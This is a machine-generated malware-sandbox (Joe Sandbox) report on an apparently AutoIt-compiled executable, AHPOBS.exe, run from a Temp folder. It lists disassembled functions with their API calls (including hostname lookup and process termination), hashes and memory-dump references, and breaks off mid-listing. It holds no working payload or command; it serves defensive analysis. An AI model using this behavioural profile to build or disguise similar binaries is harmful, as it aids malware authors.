                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                      • String ID:
                                      • API String ID: 2502553879-0
                                      • Opcode ID: f168bdbdbb7d615cef21c3de22bdeff00a8e5bc1155fca2d0277e4657a4199f2
                                      • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                      • Opcode Fuzzy Hash: f168bdbdbb7d615cef21c3de22bdeff00a8e5bc1155fca2d0277e4657a4199f2
                                      • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                      Function 0040F570 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                      • _free.LIBCMT ref: 004295A0
                                        • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                        • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                        • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                        • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                        • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                        • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                      • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\AppData\Local\Temp\AHPOBS.exe
                                      • API String ID: 3938964917-4224982150
                                      • Opcode ID: 6fc0ea0b1ed82d1b9c1707d0b49964adbabbe4d5f9141165df97f556db629ffd
                                      • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                      • Opcode Fuzzy Hash: 6fc0ea0b1ed82d1b9c1707d0b49964adbabbe4d5f9141165df97f556db629ffd
                                      • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                      Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\Temp\AHPOBS.exe,0040F545,C:\Users\user\AppData\Local\Temp\AHPOBS.exe,004A90E8,C:\Users\user\AppData\Local\Temp\AHPOBS.exe,?,0040F545), ref: 0041013C
                                        • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                        • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                        • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                        • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                        • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                      • String ID: X$pWH
                                      • API String ID: 85490731-941433119
                                      • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                      • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                      • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                      • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                      Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                      Download Yara Rule
                                      Strings
                                      • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                      • C:\Users\user\AppData\Local\Temp\AHPOBS.exe, xrefs: 00410107
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _strcat
                                      • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\AppData\Local\Temp\AHPOBS.exe
                                      • API String ID: 1765576173-23898989
                                      • Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                      • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                      • Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                      • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                      Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                      • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                      • Opcode Fuzzy Hash: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                      • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                      Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                      • String ID:
                                      • API String ID: 1794320848-0
                                      • Opcode ID: 46bae6a85b22b2e6998b893eef9abdde81a4ff8b830947c69d08c34cc75fe5f8
                                      • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                      • Opcode Fuzzy Hash: 46bae6a85b22b2e6998b893eef9abdde81a4ff8b830947c69d08c34cc75fe5f8
                                      • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                      Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                      • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Process$CurrentTerminate
                                      • String ID:
                                      • API String ID: 2429186680-0
                                      • Opcode ID: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                      • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                      • Opcode Fuzzy Hash: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                      • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                      Function 00403AF0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 53COMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                        • Part of subcall function 00403B70: _memmove.LIBCMT ref: 00403BA7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$_malloc_memmove
                                      • String ID: \5@
                                      • API String ID: 961785871-1309314528
                                      • Opcode ID: 59a1a4e90834b4d9e7541b30c628dbdcd26eb3a5843b6ea3078bf3f68b7fde69
                                      • Instruction ID: cad64edcdcba5d9ec8cd2b6a335bbe98b4fe19d5968b0e5b1ca7a0aa7405deab
                                      • Opcode Fuzzy Hash: 59a1a4e90834b4d9e7541b30c628dbdcd26eb3a5843b6ea3078bf3f68b7fde69
                                      • Instruction Fuzzy Hash: 7801D6713402007FE714AB669C86F6B7B9CDB85725F14403ABA09DB2D1D9B1ED008365
                                      Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 0043214B
                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                      • _malloc.LIBCMT ref: 0043215D
                                      • _malloc.LIBCMT ref: 0043216F
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _malloc$AllocateHeap
                                      • String ID:
                                      • API String ID: 680241177-0
                                      • Opcode ID: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                      • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                      • Opcode Fuzzy Hash: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                      • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                      Function 00409519 Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • TranslateMessage.USER32(?), ref: 00409556
                                      • DispatchMessageW.USER32(?), ref: 00409561
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Message$DispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 4217535847-0
                                      • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                      • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                      • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                      • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                      Function 004320F8 Relevance: 4.5, APIs: 3, Instructions: 25COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 0043210A
                                        • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                        • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                      • _free.LIBCMT ref: 0043211D
                                      • _free.LIBCMT ref: 00432130
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                      • Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
                                      • Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                      • Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9
                                      Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                      Download Yara Rule
                                      APIs
                                      • __wsplitpath.LIBCMT ref: 004678F7
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorLast__wsplitpath_malloc
                                      • String ID:
                                      • API String ID: 4163294574-0
                                      • Opcode ID: 4eb00fd2027c101bc4b6a1a9689c90c0b2ca4839fbf5fc8dc7e3f24fd71574f6
                                      • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                      • Opcode Fuzzy Hash: 4eb00fd2027c101bc4b6a1a9689c90c0b2ca4839fbf5fc8dc7e3f24fd71574f6
                                      • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                      Function 0040C1F0 Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 147308135f3b21b59fe2a839e0a41f8f843447f64c0a584686d16692fa5d6b25
                                      • Instruction ID: 87b54257044150471c739d151235b364616bdb39e4aa39848fe8ade81c39f20a
                                      • Opcode Fuzzy Hash: 147308135f3b21b59fe2a839e0a41f8f843447f64c0a584686d16692fa5d6b25
                                      • Instruction Fuzzy Hash: 0E519371A00105EBCB14DFA5C8C1EABB7A8AF48344F1481AEF905AB692D77CED45C798
                                      Function 00476D8D Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00476D9C
                                      • GetForegroundWindow.USER32 ref: 00476DA2
                                        • Part of subcall function 0043137E: GetWindowRect.USER32(?,?), ref: 00431399
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$CursorForegroundRect
                                      • String ID:
                                      • API String ID: 1066937146-0
                                      • Opcode ID: 64d5885011cfa2bb1c2cc0e3e3ef3e7a49081bddc9b334e8cb07f4d0956804f9
                                      • Instruction ID: 55ebd84bf59828257d56c9a3402491d5f12838e90fd89218fbbc030d7b306cc7
                                      • Opcode Fuzzy Hash: 64d5885011cfa2bb1c2cc0e3e3ef3e7a49081bddc9b334e8cb07f4d0956804f9
                                      • Instruction Fuzzy Hash: 41310472600204ABDB20EF75C881B9EB3A5FF50318F20896EF944AB381DA76AD408794
                                      Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                      • _strcat.LIBCMT ref: 0040F786
                                        • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                        • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
